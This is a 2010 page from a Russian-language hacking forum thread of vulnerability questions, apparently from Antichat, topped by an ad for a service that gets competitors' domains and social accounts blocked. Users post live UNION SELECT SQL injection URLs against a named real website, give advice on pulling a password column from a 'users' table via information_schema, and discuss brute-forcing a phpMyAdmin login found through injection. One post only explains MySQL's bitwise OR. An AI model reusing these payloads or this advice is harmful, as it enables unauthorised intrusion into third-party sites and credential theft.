УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1451 из 2438

1451

Опции темы

Поиск в этой теме

Опции просмотра

#14501

22.07.2010, 21:30

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от IMMORTAL_S

IMMORTAL_S said:
Объясните "что делает" эта запись
rand(0)|0
?? ну в смысле, для чего нужна вертикальная черта?

Цитата:

Сообщение от MySQL.ru

MySQL.ru said:
RAND()
RAND()
RAND(N)
Возвращает случайную величину с плавающей точкой в диапазоне от 0 до 1,0. Если целочисленный аргумент N указан, то он используется как начальное значение этой величины

Как-то так

#14502

22.07.2010, 21:48

Yetisports

Guest

Сообщений: n/a

Провел на форуме:
27923

Репутация: 17

почему не показать номер?

http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+

http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+

#14503

22.07.2010, 21:50

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Цитата:

Сообщение от Yetisports

Yetisports said:
почему не показать номер?
http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+
http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+

http://www.ofisdubai.com/newsletterContent.php?id=-9+union+select+1,2,3,4,5

=\

/showthread.php?p=2254732

#14504

22.07.2010, 21:51

IMMORTAL_S

Новичок

Регистрация: 29.04.2010

Сообщений: 19

Провел на форуме:
58603

Репутация: 3

Спасибо конечно.. про rand я знаю а вот для чего |0 непонял

#14505

22.07.2010, 22:05

bogdan

Guest

Сообщений: n/a

Провел на форуме:
5348

Репутация: 0

есть таблица users

table_rows - 6

есть колонки name,pass

когда делаю запрос union+select+......version()+from+users то все нормально

а запрос union+select+......pass+from+users ничего не выдает

что посоветуете?

#14506

22.07.2010, 22:13

Ins3t

Участник форума

Регистрация: 18.07.2009

Сообщений: 272

Провел на форуме:
2083691

Репутация: 330

Цитата:

Сообщение от IMMORTAL_S

IMMORTAL_S said:
Спасибо конечно.. про rand я знаю
а вот для чего
|0
непонял

Это операция Побитового "ИЛИ".

Пример:

Код:

Code:
mysql> SELECT 29 | 15;
+---------+
| 29 | 15 |
+---------+
|      31 |
+---------+
1 row in set (0.00 sec)

mysql> SELECT 5|9;
+-----+
| 5|9 |
+-----+
|  13 |
+-----+
1 row in set (0.01 sec)

mysql> SELECT 2|96;
+------+
| 2|96 |
+------+
|   98 |
+------+
1 row in set (0.00 sec)

mysql> SELECT 7|5;
+-----+
| 7|5 |
+-----+
|   7 |
+-----+
1 row in set (0.00 sec)

Можешь сверить по калькулятору(кнопка OR).

#14507

22.07.2010, 22:28

Ins3t

Участник форума

Регистрация: 18.07.2009

Сообщений: 272

Провел на форуме:
2083691

Репутация: 330

Цитата:

Сообщение от bogdan

bogdan said:
есть таблица users
table_rows - 6
есть колонки name,pass
когда делаю запрос union+select+......version()+from+users то все нормально
а запрос union+select+......pass+from+users ничего не выдает
что посоветуете?

Возможно луна в другой фазе.

Код:

Code:
UNION SELECT ...DATABASE() FROM USERS

Код:

Code:
UNION SELECT ...TABLE_SCHEMA FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME = 'users'

Вполне вероятно, что базы разные.

#14508

22.07.2010, 22:51

Anexroid

Новичок

Регистрация: 22.08.2009

Сообщений: 7

Провел на форуме:
23465

Репутация: 1

Нашел SQL-Inj

Можно ли сбрутить пароль пользователя MySQL? (MySQL v 4.3) Имя пользователя и БД - знаю.

#14509

22.07.2010, 23:05

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от Anexroid

Anexroid said:
Нашел SQL-Inj
Можно ли сбрутить пароль пользователя MySQL? (MySQL v 4.3) Имя пользователя и БД - знаю.

1. Зависит от сервера базы данных - если есть доступ к ней извне или с того же сервера, то можно пробовать брутить.

2. Если ситуация удовлетворяет первому условию, и ты начал брутить, то успех будет зависить от сложности пароля.

#14510

22.07.2010, 23:06

Anexroid

Новичок

Регистрация: 22.08.2009

Сообщений: 7

Провел на форуме:
23465

Репутация: 1

Да, нашел вход в phpmyadmin. Имя пользователя знаю.

Авторизация через .htaccess

Вопрос номер 2:

При помощи чего брутить?

Страница 1451 из 2438

1451

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход